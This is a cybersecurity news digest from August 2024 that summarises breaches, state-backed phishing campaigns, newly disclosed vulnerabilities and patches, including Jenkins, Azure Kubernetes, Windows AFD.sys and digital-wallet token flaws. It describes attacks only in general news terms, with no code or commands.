Daily Brief

August 2024 Windows updates have disrupted the dual boot functionality on Linux systems with Secure Boot enabled. The updates include a Secure Boot Advanced Targeting (SBAT) update designed to block Linux boot loaders unpatched against the CVE-2022-2601 GRUB2 vulnerability. Microsoft's advisory claims that this SBAT update shouldn't affect dual-boot systems, but user experiences suggest otherwise. Numerous Linux users report that their systems no longer boot, displaying errors related to "Verifying shim SBAT data" and "Security Policy Violation." Linux distributions like Ubuntu, Linux Mint, Zorin OS, and Puppy Linux are reportedly affected. Solutions attempted by users, including deleting SBAT policies or reinstalling Windows, have not resolved the issue. The only successful workaround mentioned involves disabling Secure Boot, updating Linux distributions, and then re-enabling Secure Boot. Microsoft has not officially recognized that the August 2024 updates might prevent dual-boot systems from booting.

Unicoin's Google Workspace was hacked, resulting in a company-wide lockout affecting all employee accounts. The unidentified hacker altered passwords, denying access to essential services like Gmail and Google Drive for four days. The security breach was detected on August 9, 2024, and access was restored on August 13, 2024. During the lockout period, the hacker had potential access to confidential internal communications and data. Unicoin has submitted a report to the U.S. Securities and Exchange Commission detailing the incident. The extent of data accessed and manipulated is under investigation, though initial findings indicate attempts at fraud. Despite the breach, Unicoin asserts the incident will not materially impact its financial health or result in asset losses.

FlightAware experienced a data breach exposing user details due to a configuration error beginning January 1, 2021, and detected only on July 25 of this year. Exposed data included user IDs, passwords, email addresses, full names, addresses, IP addresses, social media accounts, telephone numbers, year of birth, last four digits of credit card numbers, information about owned aircraft, industry title, pilot status, account activities, and Social Security Numbers. Although the exact number of impacted users remains undisclosed, FlightAware has 12 million registered users, all of whom might be affected. Upon discovering the breach, FlightAware corrected the error and mandated all potentially impacted users to reset their passwords at their next login. Affected users were offered two years of free credit monitoring services through Equifax. FlightAware regrets the breach and emphasizes its commitment to user privacy, though it did not confirm whether the exposed data was accessed or misused by unauthorized parties.

The U.S. government has issued warnings about Iranian hackers intensifying cyber operations to influence the upcoming elections by targeting presidential campaigns and the American public. Joint statements from the ODNI, FBI, and CISA highlight Iran's attempts to access sensitive U.S. election-related information and undermine trust in democratic institutions. Iranian state-backed actors are confirmed to have breached former President Trump's campaign, stealing and leaking confidential data. Microsoft and OpenAI have reported increased malicious activities by Iran, including password spraying, spear-phishing, and misuse of AI tools like ChatGPT for spreading misinformation. Meta's report ranks Iran as a major source of foreign electoral interference, second only to Russia, and details disruptions to multiple Iranian coordinated inauthentic behavior clusters. U.S. authorities continue to assure the public of the resilience of the electoral process against cyber threats, including those targeting voting infrastructure.

A previously undocumented backdoor named Msupedge was used in a cyber attack on an unnamed university in Taiwan. The attack exploited a critical vulnerability in PHP (CVE-2024-4577) to deploy the Msupedge backdoor, enabling remote code execution. Msupedge communicates with its command-and-control (C&C) server using DNS traffic, specifically employing DNS tunneling techniques. The backdoor operates as a DLL installed in specific system paths and is triggered by the Apache HTTP server. Commands to the backdoor are encoded in the resolved IP address from the C&C server, dictating the backdoor's operational behavior. Symantec’s report points out the obscure objectives and origins of the attackers using Msupedge, suggesting a complex threat environment. The backdoor's communication method and stealth features indicate a high level of sophistication in its design and execution. The same threat report highlighted the emerging threat from UTG-Q-010, which distributes the Pupy RAT using phishing tactics related to jobs and cryptocurrency.

The article discusses sophisticated cyber threats targeting applications, specifically through the Log4Shell vulnerability. Log4Shell attack involves multiple stages such as JNDI Injection, EL Injection, and command execution, exploiting a widely used Java logging framework. The attack exploits the Application Programming Interface (API) Java Naming and Directory Interface (JNDI) to inject malicious code. Application Detection and Response (ADR) technology provides robust protection against such sophisticated and layered attacks. ADR works by integrating with the application's runtime, offering deep visibility and accurate threat detection. Contrast Security's ADR technology effectively prevents and mitigates stages of Log4Shell attacks by detecting and blocking malicious actions within the application. This technology enhances overall security by integrating with broader SIEM, SOAR, and XDR systems, providing comprehensive threat management. The business benefits of implementing ADR include improved security posture, compliance with regulations like PCI DSS and GDPR, and reducing the risk of significant security breaches.

Cybersecurity researchers unveiled a privilege escalation flaw in Microsoft Azure Kubernetes Services that allows attackers to access all cluster secrets. The flaw involves exploiting TLS bootstrap tokens by compromising a pod, enabling attackers to escalate their privileges without needing root access. Microsoft has addressed the vulnerability following responsible disclosure by researchers from the Mandiant team, a Google-owned entity. The attack specifically affects Kubernetes clusters using the Azure CNI for network configuration and Azure for network policy. Exploiting the vulnerability involves leveraging the Azure WireServer to obtain encryption keys and decoding provisioning scripts containing sensitive secret keys. Mandiant suggests adopting restrictive NetworkPolicies as a mitigation measure, which limits access to essential services and blocks the exploit path. The disclosure coincides with other recent high-severity vulnerabilities found in Kubernetes components like ingress-nginx and git-sync, highlighting the ongoing security challenges in Kubernetes environments.

Iranian state-sponsored actors, coded as TA453 by Proofpoint and known by various other names in the cybersecurity community, engaged in a sophisticated spear-phishing attack aimed at a notable Jewish figure. The campaign began in late July 2024, utilizing social engineering tactics to gain the target's trust via benign initial communications, followed by malicious links to deploy intelligence-gathering malware named AnvilEcho. Proofpoint identifies TA453's affiliation with Iran's Islamic Revolutionary Guard Corps (IRGC), emphasizing the campaigns are in line with Iranian political and military aims, including in locations such as U.S., Israel, Iran, and the U.K. The primary modus operandi involves masquerading as legitimate entities and leveraging fake but credible pretexts, such as invitations to podcasts, to ensnare victims into downloading malware-laden documents or visiting phishing websites. AnvilEcho, delivered by the BlackSmith toolset, is designed to conduct comprehensive system reconnaissance, take screenshots, download remote files, and upload sensitive data via FTP and Dropbox for espionage purposes. TA453 consistently reflects its alignment with IRGC’s intelligence priorities by targeting politicians, human rights activists, and academics focusing on Middle East affairs. The phishing campaigns and malware deployment are part of broader Iranian cyber efforts against Israeli interests, indicating dedicated and ongoing cyber espionage activities. The revelation follows the disclosure of another malware strain, indicating continuous advancement and weaponization in state-sponsored cyber operations.

U.S. intelligence agencies, including ODNI, FBI, and CISA, identified Iran as likely involved in cyber operations aimed at the Trump presidential campaign. These operations were part of Iran’s broader intent to influence U.S. elections and weaken democratic processes, per the official joint statement. The incident involved spear-phishing emails believed to be from compromised accounts of a high-profile former Trump advisor, Roger Stone. The attack led to unauthorized access and subsequent leakage of sensitive campaign documents. Microsoft also reported that the phishing campaign targeted a high-ranking official within the Trump campaign. The U.S. intelligence community has reaffirmed their commitment to safeguarding upcoming elections against foreign interference, particularly calling out threats from both Russia and Iran. Recommended cybersecurity practices to mitigate such threats include using strong passwords, official emails for official duties, software updates, cautious handling of email links and attachments, and enabling multi-factor authentication.

Cybersecurity experts identify Blind Eagle, an APT group active since 2018, specializing in spear-phishing attacks across Latin America. Targets include governmental, financial, energy, oil, and gas sectors in Colombia, Ecuador, Chile, and Panama. Blind Eagle deploys RATs like AsyncRAT, BitRAT, and NjRAT via phishing emails mimicking legitimate institutions, urging recipients to perform urgent actions. Geographical redirection used in URLs to evade detection; malware delivered through a multi-stage process involving VBS and DLL files. Attack techniques include process hollowing to evade process-based defenses, showing Blind Eagle's adaptability and technical sophistication. Recent tactics include using the Hijack Loader for distributing AsyncRAT, indicating ongoing evolution and adoption of new cyberattack methods. Despite the simplicity of their techniques, Blind Eagle's operations are effective, posing ongoing threats of cyber espionage and financial credential theft in the region.

Cybersecurity researchers identified a vulnerability affecting thousands of Oracle NetSuite e-commerce sites, putting sensitive customer data at risk. The issue stems from a customer misconfiguration in the SuiteCommerce platform, particularly with Custom Record Types (CRTs) set to "No Permission Required." Exposed data includes full addresses and mobile phone numbers of customers. Attackers can access this data through NetSuite's APIs if they know the names of the relevant CRTs. Recommendations for mitigation include tightening access controls on CRTs and setting sensitive fields to "None" for public access. Aaron Costello from AppOmni suggests changing the CRTs' access type definitions to control permissions more securely. The same research also touches on an unrelated security problem in Microsoft Entra ID, highlighting risks in authentication processes in hybrid identity systems.

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has identified a critical vulnerability in Jenkins software, cataloging it due to its active exploitation in ransomware operations. The vulnerability, identified as CVE-2024-23897 with a high CVSS score of 9.8, involves a path traversal flaw that can lead to remote code execution. This security flaw was initially reported by Sonar security researchers in January 2024 and has been addressed in newer Jenkins releases by disabling a specific CLI feature. Trend Micro noted multiple attack instances tied to this vulnerability in March, originating from various countries and involving the trading of remote code execution exploits. Recent attacks leveraging this vulnerability were conducted by the cybercriminal groups IntelBroker and the RansomExx gang, targeting companies like BORN Group and Brontoo Technology Solutions. CloudSEK and Juniper Networks have reported real-world exploits of CVE-2024-23897, demonstrating its capability to allow attackers to read arbitrary files on targeted servers. In response to ongoing threats, FCEB agencies are mandated to implement the available security patches by September 9, 2024, to mitigate the risk and secure their networks.

North Korean Lazarus hacking group exploited a zero-day vulnerability in the Windows AFD.sys driver to install the FUDModule rootkit. Microsoft addressed the flaw, identified as CVE-2024-38193, in its August 2024 Patch Tuesday updates, which also resolved seven other zero-day vulnerabilities. CVE-2024-38193, a Bring Your Own Vulnerable Driver (BYOVD) issue in the Windows Ancillary Function Driver for WinSock, enabled kernel-level access via the Winsock protocol. The zero-day flaw was discovered by Gen Digital researchers who pointed out that Lazarus utilized this vulnerability to disable Windows monitoring systems covertly. Researchers highlighted that the Lazarus group’s exploitation of this vulnerability allowed them easy kernel access without the need to install additional outdated drivers that could be detected and blocked by security measures. The Lazarus group has previously engaged in similar attacks exploiting Windows and Dell kernel drivers in their cyber operations, focusing on financial gains to support North Korean government initiatives. There's a reward of up to $5 million for information on the DPRK hackers' malicious activities as they pose a significant threat to global cybersecurity.

Digital wallets like Apple Pay, Google Pay, and PayPal can facilitate unauthorized transactions with stolen or cancelled credit cards, as new research reveals. Security researchers from UMass Amherst and Penn State identified vulnerabilities in authentication processes that allow attackers to bypass standard security measures. Attackers can exploit weak token refresh policies and authentication checks to maintain access to a victim's credit line, even after the card is reported lost or cancelled. Using publicly accessible data, criminals can obtain enough personal information to authenticate the stolen card under a weaker security protocol set by the bank. The process involves adding the stolen card to the attacker's digital wallet, where issuing banks fail to verify the token's rightful owner during reissuance. Even locked or cancelled credit cards remain operable in a digital wallet, due to improperly coded reoccurring transactions by merchants. Some banks and digital wallet services have responded to these findings and are reportedly taking steps to enhance security measures. Researchers recommend implementing more secure forms of user verification and continuous monitoring of token and transaction authenticity.

Toyota acknowledged a breach of its systems following the exposure of 240GB of data on a hacking forum. The leaked information includes details about Toyota employees and customers, financial records, and contracts. The perpetrator, identified as ZeroSevenGroup, claimed to have accessed the company's U.S. branch using the ADRecon tool to gather extensive information from Active Directory. Despite the breach, Toyota maintains it is a limited-scope issue, not affecting their systems widely. Toyota is currently engaging with affected parties to provide necessary assistance, although specific details about the breach's discovery and the extent of exposed personal data remain undisclosed. Incident dates back to files created or stolen on December 25, 2022, suggesting a possible breach of a backup server. This event follows several other security incidents involving Toyota, including a ransomware attack and multiple misconfigurations of cloud services in recent years.